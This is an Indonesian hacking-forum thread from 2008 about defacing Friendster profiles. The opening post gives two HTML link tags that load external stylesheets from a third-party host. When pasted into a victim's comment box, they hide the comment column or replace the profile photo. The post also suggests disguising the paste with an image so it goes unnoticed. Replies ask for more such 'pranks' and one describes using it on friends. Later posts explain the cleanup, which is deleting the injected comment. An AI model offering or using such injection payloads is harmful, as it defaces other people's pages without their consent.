Username Password

Lost Password
View Thread
Explore Your Brain » All About Security I.T » Black & White Proof of Concept
deface fs
Username
Password
Register FAQ Members List Today's Posts Search

Print Thread

28-08-2008 01:20 AM deface fs
User Avatar

caesar_independent
Genin


Posts: 55
Joined: 05.07.08
Location: jakarta
Age: 31
tau deh nih masih bs apa engga scriptnya
tapi apa salahnya untuk dicoba..

nih langsung aja

kalo mau buat ilangin kolom komen si target

<link rel='stylesheet' type='text/css' href='http://suhendri.110mb.com/hack.css'>

nah ini kalo mau ganti primary fotonya jadi gambar kucing

<link rel='stylesheet' type='text/css' href='http://suhendri.110mb.com/sdean.css'>



NB : copy tuh kode terus paste di koment..kalo supaya g dicurigain mendingan sisipin gambar..
okey..

tobesmart.co.cc
 
Offline
28-08-2008 05:14 AM RE: deface fs
User Avatar

EVA-00
HackAge


Posts: 2769
Joined: 21.05.08
Location: Wallahu a'lam
Age: 34
Walaupun udah basi, tapi gak apa-apa untuk nambah wawasan temen-temen yang blm tau. Cool
Nabi Muhammad SAW bersabda :” Barangsiapa Yang Mengamalkan Ilmu Yang Ia Ketahui Maka Allah Akan Memberikan Kepadanya Ilmu Yang Belum Ia Ketahui” (HR. Imam Ahmad).

..::shn6 u!vJq Jnoh 3Joldx3 d33>I::..
 
Offline
28-08-2008 04:17 PM RE: deface fs
User Avatar

tukang_gosip
Murid Akademi I


Posts: 11
Joined: 24.07.08
Location: denpasar
Age: 32
yang baru ada gak? cra deface tanpa harus post comment, gue belajar deface friendster sasarannya temen sendiri eh....malah temen gue pada kabur...gak punya temen sekarFrownang deh..
 
Offline
05-09-2008 11:58 PM RE: deface fs
User Avatar

chandra_rock22
Chunnin Senior


Posts: 111
Joined: 08.07.08
Location: Medan, Sumatra Utara
Age: 31
pas bgt nih...
soalnya lagi heboh2nya fs teman aq kena deface...
gimana cara menanggulagi fs yg uda kena deface?
bls yo...
Terus Cari Ilmu Demi Sesuap Nasi
 
Offline
06-09-2008 01:26 AM RE: deface fs
User Avatar

ibliz-tampan
Jounin


Posts: 154
Joined: 12.06.08
Location: Between Hell & Heaven
Age: 34
Untuk benerin FS yang udah ke Deface caranya gampang kok (tapi bagi yg blm tau kan susah juga...) dan ini udah pernah di bahas sama om EVA-00 di sini (tapi sayang xploitnya udah basi gak bs di pake buat deface lagi Sad ), intinya cuma hapus comment aja, kalo ada comment yang lu curigain, mendingan apus aja tu comment. nti FS nya normal lagi kok.

Thanks.

I.T
www19.indowebster.com/e23ac9c395a9e77927d66c9f5d7b288f.png
 
Offline
05-10-2008 03:32 PM RE: deface fs
User Avatar

si_tunge
Anbu


Posts: 376
Joined: 09.09.08
Location: Di dalam kancutnya sandra dewi
Age: 31
Mana Lagi niH teknik2 tntang "isenk2" d friendster.
TOLONG d share yah bro n sis.
INDONESIA GW ANCUR GARA2 PEMIMPINNYA CACAD
 
Offline
25-03-2009 06:51 PM RE: deface fs
User Avatar

dhevganx
Genin


Posts: 58
Joined: 25.03.09
Location: Area 51
ada yang pernah "iseng2" di fesbuk?? di share dong...

Grin
 
Offline
25-03-2009 07:31 PM RE: deface fs
User Avatar

mfakhruddin
Murid Akademi I


Posts: 4
Joined: 23.02.09
matiin flash, matiin javascript, terus hapus deh komennya
 
  x 1
Offline
Jump to Forum:
Forum powered by fusionBoard
Share this Thread
URL:
BBcode:
HTML:
Similar Threads
Thread Forum Replies Last Post
Bisa G kita Deface Blog ??? Black & White Proof of Concept 15 03-12-2009 09:31
Copyright © 2007-2016